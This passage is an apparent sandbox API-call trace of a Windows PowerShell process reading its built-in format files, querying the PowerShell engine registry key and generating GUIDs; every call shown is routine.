	[0783.000] ReadFile (in: hFile=0x314, lpBuffer=0x3350b30, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ecd38, lpOverlapped=0x0 | out: lpBuffer=0x3350b30*, lpNumberOfBytesRead=0x1ecd38*=0x1000, lpOverlapped=0x0) returned 1
	[0783.001] ReadFile (in: hFile=0x314, lpBuffer=0x3350b30, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ecd38, lpOverlapped=0x0 | out: lpBuffer=0x3350b30*, lpNumberOfBytesRead=0x1ecd38*=0xbce, lpOverlapped=0x0) returned 1
	[0783.001] ReadFile (in: hFile=0x314, lpBuffer=0x3350266, nNumberOfBytesToRead=0x32, lpNumberOfBytesRead=0x1ecd38, lpOverlapped=0x0 | out: lpBuffer=0x3350266*, lpNumberOfBytesRead=0x1ecd38*=0x0, lpOverlapped=0x0) returned 1
	[0783.001] ReadFile (in: hFile=0x314, lpBuffer=0x3350b30, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ecd38, lpOverlapped=0x0 | out: lpBuffer=0x3350b30*, lpNumberOfBytesRead=0x1ecd38*=0x0, lpOverlapped=0x0) returned 1
	[0783.001] CloseHandle (hObject=0x314) returned 1
	[0783.001] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml", nBufferLength=0x105, lpBuffer=0x1eca80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml", lpFilePart=0x0) returned 0x44
	[0783.001] SetErrorMode (uMode=0x1) returned 0x1
	[0783.002] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\dotnettypes.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x1ecce0 | out: lpFileInformation=0x1ecce0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67e0582f, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67e0582f, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe5e29f95, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x11bce)) returned 1
	[0783.002] SetErrorMode (uMode=0x1) returned 0x1
	[0783.002] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml", nBufferLength=0x105, lpBuffer=0x1eca10, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml", lpFilePart=0x0) returned 0x44
	[0783.002] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x1ecdc8 | out: phkResult=0x1ecdc8*=0x314) returned 0x0
	[0783.002] RegQueryValueExW (in: hKey=0x314, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x1ecd4c, lpData=0x0, lpcbData=0x1ecd48*=0x0 | out: lpType=0x1ecd4c*=0x1, lpData=0x0, lpcbData=0x1ecd48*=0x56) returned 0x0
	[0783.002] CoTaskMemAlloc (cb=0x5a) returned 0x47ed70
	[0783.003] RegQueryValueExW (in: hKey=0x314, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x1ecd1c, lpData=0x47ed70, lpcbData=0x1ecd18*=0x56 | out: lpType=0x1ecd1c*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0x1ecd18*=0x56) returned 0x0
	[0783.003] CoTaskMemFree (pv=0x47ed70) 
	[0783.003] RegCloseKey (hKey=0x314) returned 0x0
	[0783.003] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml", nBufferLength=0x105, lpBuffer=0x1eca10, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml", lpFilePart=0x0) returned 0x44
	[0783.003] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml", nBufferLength=0x105, lpBuffer=0x1ec8c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml", lpFilePart=0x0) returned 0x44
	[0783.004] CoCreateGuid (in: pguid=0x1ecff0 | out: pguid=0x1ecff0*(Data1=0x6c10f749, Data2=0x6350, Data3=0x4e86, Data4=([0]=0xac, [1]=0x62, [2]=0xbb, [3]=0xb5, [4]=0xd7, [5]=0x58, [6]=0xb1, [7]=0x4e))) returned 0x0
	[0783.004] CoCreateGuid (in: pguid=0x1ecff0 | out: pguid=0x1ecff0*(Data1=0x5d2d3396, Data2=0xc191, Data3=0x44e5, Data4=([0]=0xb8, [1]=0x5c, [2]=0x14, [3]=0x62, [4]=0xa3, [5]=0x3e, [6]=0x43, [7]=0xc3))) returned 0x0
	[0783.005] CoCreateGuid (in: pguid=0x1ecff0 | out: pguid=0x1ecff0*(Data1=0xc9698c0b, Data2=0xde8a, Data3=0x4ef8, Data4=([0]=0xb3, [1]=0xef, [2]=0x2, [3]=0x87, [4]=0x52, [5]=0x78, [6]=0x5, [7]=0x94))) returned 0x0
	[0783.005] CoCreateGuid (in: pguid=0x1ecff0 | out: pguid=0x1ecff0*(Data1=0x76c6e951, Data2=0xe3c2, Data3=0x4076, Data4=([0]=0x88, [1]=0x12, [2]=0xde, [3]=0xda, [4]=0x9f, [5]=0xe7, [6]=0x92, [7]=0x6e))) returned 0x0
	[0783.005] CoCreateGuid (in: pguid=0x1ecff0 | out: pguid=0x1ecff0*(Data1=0x5a1a7fcf, Data2=0xa0c, Data3=0x43c5, Data4=([0]=0xa7, [1]=0xab, [2]=0x6f, [3]=0x5b, [4]=0x5, [5]=0x4f, [6]=0xed, [7]=0xc2))) returned 0x0
	[0783.005] CoCreateGuid (in: pguid=0x1ecff0 | out: pguid=0x1ecff0*(Data1=0x28cc9a7e, Data2=0xb957, Data3=0x484d, Data4=([0]=0xa1, [1]=0x17, [2]=0x23, [3]=0x33, [4]=0x17, [5]=0x81, [6]=0xca, [7]=0x7))) returned 0x0
	[0783.005] CoCreateGuid (in: pguid=0x1ecff0 | out: pguid=0x1ecff0*(Data1=0x5c77280e, Data2=0xa286, Data3=0x4bf7, Data4=([0]=0xb2, [1]=0xe5, [2]=0xc3, [3]=0x29, [4]=0xa1, [5]=0x4c, [6]=0xd1, [7]=0x75))) returned 0x0
	[0783.006] CoCreateGuid (in: pguid=0x1ecff0 | out: pguid=0x1ecff0*(Data1=0x445a7bef, Data2=0xb351, Data3=0x44c7, Data4=([0]=0x95, [1]=0x86, [2]=0x70, [3]=0xf2, [4]=0x6f, [5]=0x9e, [6]=0x62, [7]=0x20))) returned 0x0
	[0783.006] CoCreateGuid (in: pguid=0x1ecff0 | out: pguid=0x1ecff0*(Data1=0x512cf80c, Data2=0x8b4d, Data3=0x4e9f, Data4=([0]=0x87, [1]=0xcd, [2]=0x57, [3]=0xaf, [4]=0x9c, [5]=0x2c, [6]=0x8e, [7]=0x7b))) returned 0x0
	[0783.006] CoCreateGuid (in: pguid=0x1ecff0 | out: pguid=0x1ecff0*(Data1=0xd459a834, Data2=0xc724, Data3=0x4604, Data4=([0]=0x9c, [1]=0xbb, [2]=0xda, [3]=0xe7, [4]=0xe8, [5]=0x54, [6]=0x71, [7]=0x7b))) returned 0x0
	[0783.006] CoCreateGuid (in: pguid=0x1ecff0 | out: pguid=0x1ecff0*(Data1=0x2be7971d, Data2=0x1aa3, Data3=0x4cdd, Data4=([0]=0x91, [1]=0x4, [2]=0xf, [3]=0xe6, [4]=0x9a, [5]=0x10, [6]=0x57, [7]=0xce))) returned 0x0
	[0783.006] CoCreateGuid (in: pguid=0x1ecff0 | out: pguid=0x1ecff0*(Data1=0xf9b2cc39, Data2=0x65d7, Data3=0x4608, Data4=([0]=0x87, [1]=0x63, [2]=0xec, [3]=0x30, [4]=0xf6, [5]=0xce, [6]=0x41, [7]=0xff))) returned 0x0
	[0783.007] CoCreateGuid (in: pguid=0x1ecff0 | out: pguid=0x1ecff0*(Data1=0x1e0260e1, Data2=0xadb0, Data3=0x406d, Data4=([0]=0x87, [1]=0x7e, [2]=0x18, [3]=0xae, [4]=0x87, [5]=0x8f, [6]=0x4a, [7]=0x57))) returned 0x0
	[0783.007] CoCreateGuid (in: pguid=0x1ecff0 | out: pguid=0x1ecff0*(Data1=0xa116a823, Data2=0x43c3, Data3=0x4fd1, Data4=([0]=0x86, [1]=0x6c, [2]=0x23, [3]=0x36, [4]=0x6a, [5]=0x85, [6]=0x4c, [7]=0xe5))) returned 0x0
	[0783.007] CoCreateGuid (in: pguid=0x1ecff0 | out: pguid=0x1ecff0*(Data1=0xc8b20fa7, Data2=0x8877, Data3=0x451b, Data4=([0]=0x92, [1]=0xa9, [2]=0xcd, [3]=0x9, [4]=0xfe, [5]=0x7a, [6]=0x3, [7]=0x59))) returned 0x0
	[0783.007] CoCreateGuid (in: pguid=0x1ecff0 | out: pguid=0x1ecff0*(Data1=0x2ba7d247, Data2=0xefc, Data3=0x463c, Data4=([0]=0x8f, [1]=0xbb, [2]=0x5b, [3]=0x7, [4]=0x67, [5]=0x53, [6]=0x3e, [7]=0x4c))) returned 0x0
	[0783.008] CoCreateGuid (in: pguid=0x1ecff0 | out: pguid=0x1ecff0*(Data1=0xd45fe93b, Data2=0xaf33, Data3=0x482f, Data4=([0]=0x9e, [1]=0x61, [2]=0x9b, [3]=0x17, [4]=0x3, [5]=0x88, [6]=0xcd, [7]=0x6a))) returned 0x0
	[0783.008] CoCreateGuid (in: pguid=0x1ecff0 | out: pguid=0x1ecff0*(Data1=0x675cac1, Data2=0x1335, Data3=0x4b4b, Data4=([0]=0xbd, [1]=0x65, [2]=0xb9, [3]=0x47, [4]=0xc3, [5]=0xa3, [6]=0x2a, [7]=0x28))) returned 0x0
	[0783.009] CoCreateGuid (in: pguid=0x1ecff0 | out: pguid=0x1ecff0*(Data1=0x186115e4, Data2=0x6ed3, Data3=0x4563, Data4=([0]=0xa8, [1]=0x11, [2]=0xaa, [3]=0xe2, [4]=0x28, [5]=0x63, [6]=0xfe, [7]=0x29))) returned 0x0
	[0783.009] CoCreateGuid (in: pguid=0x1ecff0 | out: pguid=0x1ecff0*(Data1=0xe6759065, Data2=0xfffb, Data3=0x46b0, Data4=([0]=0x88, [1]=0x95, [2]=0x9c, [3]=0x4a, [4]=0x65, [5]=0x60, [6]=0xbf, [7]=0xd8))) returned 0x0
	[0783.009] CoCreateGuid (in: pguid=0x1ecff0 | out: pguid=0x1ecff0*(Data1=0xfbce0fdc, Data2=0x7559, Data3=0x4f6e, Data4=([0]=0x80, [1]=0xa5, [2]=0x17, [3]=0x6a, [4]=0x5b, [5]=0x9a, [6]=0xfa, [7]=0xc7))) returned 0x0
	[0783.010] CoCreateGuid (in: pguid=0x1ecff0 | out: pguid=0x1ecff0*(Data1=0x70cb2f0c, Data2=0xbc1a, Data3=0x4d8d, Data4=([0]=0xb2, [1]=0x44, [2]=0x2b, [3]=0x6, [4]=0xdf, [5]=0xe5, [6]=0x37, [7]=0x88))) returned 0x0
	[0783.010] CoCreateGuid (in: pguid=0x1ecff0 | out: pguid=0x1ecff0*(Data1=0x413fbc84, Data2=0xf801, Data3=0x43f9, Data4=([0]=0xab, [1]=0x94, [2]=0xac, [3]=0x9, [4]=0x8e, [5]=0x72, [6]=0x36, [7]=0xbc))) returned 0x0
	[0783.010] CoCreateGuid (in: pguid=0x1ecff0 | out: pguid=0x1ecff0*(Data1=0x55c6866c, Data2=0x62cc, Data3=0x48d5, Data4=([0]=0x91, [1]=0x89, [2]=0xd3, [3]=0xcb, [4]=0xa, [5]=0xec, [6]=0x8f, [7]=0xfb))) returned 0x0
	[0783.010] CoCreateGuid (in: pguid=0x1ecff0 | out: pguid=0x1ecff0*(Data1=0xf9bc174b, Data2=0xd779, Data3=0x4f19, Data4=([0]=0x8e, [1]=0xaf, [2]=0xda, [3]=0xa1, [4]=0x1a, [5]=0xef, [6]=0xdc, [7]=0x6d))) returned 0x0
	[0783.011] CoCreateGuid (in: pguid=0x1ecff0 | out: pguid=0x1ecff0*(Data1=0x9736828, Data2=0xd0f6, Data3=0x4a27, Data4=([0]=0xb7, [1]=0x10, [2]=0x44, [3]=0x56, [4]=0xae, [5]=0xb4, [6]=0xa, [7]=0xa7))) returned 0x0
	[0783.011] CoCreateGuid (in: pguid=0x1ecff0 | out: pguid=0x1ecff0*(Data1=0xdd2dca1b, Data2=0x8f2e, Data3=0x40ee, Data4=([0]=0x8c, [1]=0xa5, [2]=0xff, [3]=0x2, [4]=0x7d, [5]=0x75, [6]=0x15, [7]=0xcd))) returned 0x0
	[0783.011] CoCreateGuid (in: pguid=0x1ecff0 | out: pguid=0x1ecff0*(Data1=0xe3a7740, Data2=0x2c28, Data3=0x47fa, Data4=([0]=0x98, [1]=0x89, [2]=0xdf, [3]=0x32, [4]=0xbe, [5]=0xbb, [6]=0x7d, [7]=0xb8))) returned 0x0
	[0783.012] CoCreateGuid (in: pguid=0x1ecff0 | out: pguid=0x1ecff0*(Data1=0xdc5d2ecb, Data2=0x7cd4, Data3=0x49ac, Data4=([0]=0x8d, [1]=0x3c, [2]=0xd5, [3]=0xd6, [4]=0x6e, [5]=0x9f, [6]=0x3a, [7]=0x87))) returned 0x0
	[0783.012] CoCreateGuid (in: pguid=0x1ecff0 | out: pguid=0x1ecff0*(Data1=0x6f4b7e3b, Data2=0x890a, Data3=0x49d4, Data4=([0]=0x87, [1]=0x66, [2]=0x79, [3]=0x44, [4]=0xba, [5]=0xe5, [6]=0x98, [7]=0xed))) returned 0x0
	[0783.012] CoCreateGuid (in: pguid=0x1ecff0 | out: pguid=0x1ecff0*(Data1=0xa459d424, Data2=0x3ca5, Data3=0x4848, Data4=([0]=0xa2, [1]=0xc6, [2]=0x1e, [3]=0x8d, [4]=0x9f, [5]=0x30, [6]=0x36, [7]=0x85))) returned 0x0
	[0783.012] CoCreateGuid (in: pguid=0x1ecff0 | out: pguid=0x1ecff0*(Data1=0xdc66839, Data2=0xdd68, Data3=0x497f, Data4=([0]=0xb9, [1]=0x98, [2]=0x3a, [3]=0x5e, [4]=0x87, [5]=0x8a, [6]=0x7e, [7]=0x9f))) returned 0x0
	[0783.013] CoCreateGuid (in: pguid=0x1ecff0 | out: pguid=0x1ecff0*(Data1=0xc96408a3, Data2=0xb51f, Data3=0x4164, Data4=([0]=0x91, [1]=0x41, [2]=0x6a, [3]=0x21, [4]=0xb1, [5]=0xc, [6]=0x4c, [7]=0x4a))) returned 0x0
	[0783.013] CoCreateGuid (in: pguid=0x1ecff0 | out: pguid=0x1ecff0*(Data1=0xd67bb327, Data2=0x11e, Data3=0x48d3, Data4=([0]=0xbe, [1]=0xe7, [2]=0x98, [3]=0x60, [4]=0x2b, [5]=0x1f, [6]=0x21, [7]=0xc0))) returned 0x0
	[0783.013] CoCreateGuid (in: pguid=0x1ecff0 | out: pguid=0x1ecff0*(Data1=0xf75128e5, Data2=0x9d0b, Data3=0x47d0, Data4=([0]=0x92, [1]=0x7c, [2]=0x88, [3]=0xf1, [4]=0x44, [5]=0xfd, [6]=0x8f, [7]=0x7d))) returned 0x0
	[0783.013] CoCreateGuid (in: pguid=0x1ecff0 | out: pguid=0x1ecff0*(Data1=0x4f4c6645, Data2=0xae01, Data3=0x442c, Data4=([0]=0xa0, [1]=0x2a, [2]=0xa, [3]=0x4d, [4]=0x48, [5]=0xa0, [6]=0x40, [7]=0x5d))) returned 0x0
	[0783.017] CoCreateGuid (in: pguid=0x1ecff0 | out: pguid=0x1ecff0*(Data1=0xfc5e1f7a, Data2=0x9182, Data3=0x43d1, Data4=([0]=0x8d, [1]=0x5e, [2]=0xb0, [3]=0x20, [4]=0xb3, [5]=0x83, [6]=0xcd, [7]=0x76))) returned 0x0
	[0783.017] CreateFileW (lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\filesystem.format.ps1xml"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x314
	[0783.017] GetFileType (hFile=0x314) returned 0x1
	[0783.017] SetErrorMode (uMode=0x1) returned 0x1
	[0783.017] GetFileType (hFile=0x314) returned 0x1
	[0783.018] ReadFile (in: hFile=0x314, lpBuffer=0x3461378, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ecd38, lpOverlapped=0x0 | out: lpBuffer=0x3461378*, lpNumberOfBytesRead=0x1ecd38*=0x1000, lpOverlapped=0x0) returned 1
	[0783.722] ReadFile (in: hFile=0x314, lpBuffer=0x329bf00, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ecd38, lpOverlapped=0x0 | out: lpBuffer=0x329bf00*, lpNumberOfBytesRead=0x1ecd38*=0x1000, lpOverlapped=0x0) returned 1
	[0783.722] ReadFile (in: hFile=0x314, lpBuffer=0x329bf00, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ecd38, lpOverlapped=0x0 | out: lpBuffer=0x329bf00*, lpNumberOfBytesRead=0x1ecd38*=0x1000, lpOverlapped=0x0) returned 1
	[0783.722] ReadFile (in: hFile=0x314, lpBuffer=0x329bf00, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ecd38, lpOverlapped=0x0 | out: lpBuffer=0x329bf00*, lpNumberOfBytesRead=0x1ecd38*=0x1000, lpOverlapped=0x0) returned 1
	[0783.722] ReadFile (in: hFile=0x314, lpBuffer=0x329bf00, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ecd38, lpOverlapped=0x0 | out: lpBuffer=0x329bf00*, lpNumberOfBytesRead=0x1ecd38*=0x1000, lpOverlapped=0x0) returned 1
	[0783.723] ReadFile (in: hFile=0x314, lpBuffer=0x329bf00, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ecd38, lpOverlapped=0x0 | out: lpBuffer=0x329bf00*, lpNumberOfBytesRead=0x1ecd38*=0x1000, lpOverlapped=0x0) returned 1
	[0783.723] ReadFile (in: hFile=0x314, lpBuffer=0x329bf00, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ecd38, lpOverlapped=0x0 | out: lpBuffer=0x329bf00*, lpNumberOfBytesRead=0x1ecd38*=0x119, lpOverlapped=0x0) returned 1
	[0783.723] ReadFile (in: hFile=0x314, lpBuffer=0x329bf00, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ecd38, lpOverlapped=0x0 | out: lpBuffer=0x329bf00*, lpNumberOfBytesRead=0x1ecd38*=0x0, lpOverlapped=0x0) returned 1
	[0783.723] CloseHandle (hObject=0x314) returned 1
	[0783.723] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml", nBufferLength=0x105, lpBuffer=0x1eca80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml", lpFilePart=0x0) returned 0x43
	[0783.724] SetErrorMode (uMode=0x1) returned 0x1
	[0783.724] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\filesystem.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x1ecce0 | out: lpFileInformation=0x1ecce0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67e2b98c, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67e2b98c, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe5e76251, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x6119)) returned 1
	[0783.724] SetErrorMode (uMode=0x1) returned 0x1
	[0783.724] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml", nBufferLength=0x105, lpBuffer=0x1eca10, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml", lpFilePart=0x0) returned 0x43
	[0783.724] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x1ecdc8 | out: phkResult=0x1ecdc8*=0x314) returned 0x0
	[0783.724] RegQueryValueExW (in: hKey=0x314, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x1ecd4c, lpData=0x0, lpcbData=0x1ecd48*=0x0 | out: lpType=0x1ecd4c*=0x1, lpData=0x0, lpcbData=0x1ecd48*=0x56) returned 0x0
	[0783.724] CoTaskMemAlloc (cb=0x5a) returned 0x47ed70
	[0783.727] RegQueryValueExW (in: hKey=0x314, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x1ecd1c, lpData=0x47ed70, lpcbData=0x1ecd18*=0x56 | out: lpType=0x1ecd1c*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0x1ecd18*=0x56) returned 0x0
	[0783.727] CoTaskMemFree (pv=0x47ed70) 
	[0783.727] RegCloseKey (hKey=0x314) returned 0x0
	[0783.727] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml", nBufferLength=0x105, lpBuffer=0x1eca10, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml", lpFilePart=0x0) returned 0x43
	[0783.728] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml", nBufferLength=0x105, lpBuffer=0x1ec8c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml", lpFilePart=0x0) returned 0x43
	[0783.728] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ec350, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0783.728] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ec2a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0783.729] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ec2a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0783.729] VirtualQuery (in: lpAddress=0x1eb860, lpBuffer=0x1ec720, dwLength=0x30 | out: lpBuffer=0x1ec720*(BaseAddress=0x1eb000, AllocationBase=0x170000, AllocationProtect=0x4, __alignment1=0xfffff8a0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0783.730] CoCreateGuid (in: pguid=0x1ecff0 | out: pguid=0x1ecff0*(Data1=0x364e44e3, Data2=0xfd2f, Data3=0x4740, Data4=([0]=0xb0, [1]=0xcf, [2]=0x5c, [3]=0x6d, [4]=0xa5, [5]=0xe5, [6]=0xcb, [7]=0x3e))) returned 0x0
	[0783.730] VirtualQuery (in: lpAddress=0x1eb9a0, lpBuffer=0x1ec860, dwLength=0x30 | out: lpBuffer=0x1ec860*(BaseAddress=0x1eb000, AllocationBase=0x170000, AllocationProtect=0x4, __alignment1=0xfffff8a0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0783.733] CoCreateGuid (in: pguid=0x1ecff0 | out: pguid=0x1ecff0*(Data1=0x7967cbd6, Data2=0x8120, Data3=0x477d, Data4=([0]=0xa8, [1]=0x5f, [2]=0x96, [3]=0x99, [4]=0x66, [5]=0xdf, [6]=0x53, [7]=0xdf))) returned 0x0
	[0783.734] CoCreateGuid (in: pguid=0x1ecff0 | out: pguid=0x1ecff0*(Data1=0x7719ee01, Data2=0x8e52, Data3=0x4626, Data4=([0]=0x8e, [1]=0x80, [2]=0x0, [3]=0x1a, [4]=0xc2, [5]=0xe2, [6]=0x15, [7]=0xe8))) returned 0x0
	[0783.735] CoCreateGuid (in: pguid=0x1ecff0 | out: pguid=0x1ecff0*(Data1=0xaf38d135, Data2=0xb486, Data3=0x43b6, Data4=([0]=0xaf, [1]=0x98, [2]=0xdd, [3]=0x7d, [4]=0xb9, [5]=0x78, [6]=0x52, [7]=0x2b))) returned 0x0
	[0783.735] VirtualQuery (in: lpAddress=0x1eb9a0, lpBuffer=0x1ec860, dwLength=0x30 | out: lpBuffer=0x1ec860*(BaseAddress=0x1eb000, AllocationBase=0x170000, AllocationProtect=0x4, __alignment1=0xfffff8a0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0783.736] CreateFileW (lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Help.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\help.format.ps1xml"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x314
	[0783.736] GetFileType (hFile=0x314) returned 0x1
	[0783.736] SetErrorMode (uMode=0x1) returned 0x1
	[0783.736] GetFileType (hFile=0x314) returned 0x1
	[0783.736] ReadFile (in: hFile=0x314, lpBuffer=0x32f8560, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ecd38, lpOverlapped=0x0 | out: lpBuffer=0x32f8560*, lpNumberOfBytesRead=0x1ecd38*=0x1000, lpOverlapped=0x0) returned 1
	[0783.737] ReadFile (in: hFile=0x314, lpBuffer=0x32f8560, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ecd38, lpOverlapped=0x0 | out: lpBuffer=0x32f8560*, lpNumberOfBytesRead=0x1ecd38*=0x1000, lpOverlapped=0x0) returned 1
	[0783.737] ReadFile (in: hFile=0x314, lpBuffer=0x32f8560, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ecd38, lpOverlapped=0x0 | out: lpBuffer=0x32f8560*, lpNumberOfBytesRead=0x1ecd38*=0x1000, lpOverlapped=0x0) returned 1
	[0783.738] ReadFile (in: hFile=0x314, lpBuffer=0x32f8560, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ecd38, lpOverlapped=0x0 | out: lpBuffer=0x32f8560*, lpNumberOfBytesRead=0x1ecd38*=0x1000, lpOverlapped=0x0) returned 1
	[0783.738] ReadFile (in: hFile=0x314, lpBuffer=0x32f8560, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ecd38, lpOverlapped=0x0 | out: lpBuffer=0x32f8560*, lpNumberOfBytesRead=0x1ecd38*=0x1000, lpOverlapped=0x0) returned 1
	[0783.738] ReadFile (in: hFile=0x314, lpBuffer=0x32f8560, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ecd38, lpOverlapped=0x0 | out: lpBuffer=0x32f8560*, lpNumberOfBytesRead=0x1ecd38*=0x1000, lpOverlapped=0x0) returned 1
	[0783.738] ReadFile (in: hFile=0x314, lpBuffer=0x32f8560, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ecd38, lpOverlapped=0x0 | out: lpBuffer=0x32f8560*, lpNumberOfBytesRead=0x1ecd38*=0x1000, lpOverlapped=0x0) returned 1
	[0783.738] ReadFile (in: hFile=0x314, lpBuffer=0x32f8560, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ecd38, lpOverlapped=0x0 | out: lpBuffer=0x32f8560*, lpNumberOfBytesRead=0x1ecd38*=0x1000, lpOverlapped=0x0) returned 1
	[0783.740] ReadFile (in: hFile=0x314, lpBuffer=0x32f8560, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ecd38, lpOverlapped=0x0 | out: lpBuffer=0x32f8560*, lpNumberOfBytesRead=0x1ecd38*=0x1000, lpOverlapped=0x0) returned 1
